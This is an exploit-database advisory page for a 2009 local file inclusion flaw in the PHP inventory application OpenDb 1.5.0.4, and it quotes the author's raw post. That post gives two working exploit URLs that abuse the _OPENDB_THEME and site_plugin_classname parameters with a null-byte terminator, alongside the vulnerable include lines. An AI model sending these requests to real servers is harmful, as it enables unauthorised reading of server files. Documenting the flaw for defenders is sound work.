OpenDb 1.5.0.4 Multiple LFI Vulnerability

vendor:

OpenDb

by:

ViRuSMaN

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: OpenDb

Affected Version From: 1.5.0.4

Affected Version To: 1.5.0.4

Patch Exists: NO

Related CWE: N/A

CPE: a:opendb:opendb:1.5.0.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2009

OpenDb 1.5.0.4 Multiple LFI Vulnerability

OpenDb 1.5.0.4 is vulnerable to Local File Inclusion (LFI) attacks. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The vulnerable files are include/begin.inc.php and functions/site_plugin.php. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The vulnerable files are include/begin.inc.php and functions/site_plugin.php. The attacker can use the ‘_OPENDB_THEME’ and ‘site_plugin_classname’ parameters to inject malicious code into the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is not vulnerable to LFI attacks. This can be done by validating user input and sanitizing the input before using it in the application.

Source

Exploit-DB raw data:

==============================================================================
__ __ __ __ __ __
/ \ / \ \ \ / / / \ / \
/ /\ \_/ /\ \ \ \ / / / /\ \_/ /\ \
/ / \ _ / \ \ \ \/ / / / \ _ / \ \
/_/ \_\ \__/ /_/ \_\

==============================================================================
[»] ~ Note : Works Only With Magic_Quotes_Gpc = Off .
==============================================================================
[»] OpenDb 1.5.0.4 Multiple LFI Vulnerability
==============================================================================

[»] Script: [ OpenDb ]
[»] Language: [ PHP ]
[»] Site page: [ The Open Media Collectors Database is a PHP and MySQL based inventory application ]
[»] Download: [ http://sourceforge.net/projects/opendb/files/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===
#~ [C:\AppServ\www\Scripts\opendb\include\begin.inc.php]
#~ Line 213 : include_once("./theme/$_OPENDB_THEME/theme.php");

[»] http://target/path/include/begin.inc.php?_OPENDB_THEME=[LFI%00]


===[ Exploit 2 ]===
#~[C:\AppServ\www\Scripts\opendb\functions\site_plugin.php]
#~Line 126 : include_once("./site/".$site_plugin_classname.".class.php");

[»] http://target/path/functions/site_plugin.php?site_plugin_classname=[LFI%00]

Author: ViRuSMaN <-

###########################################################################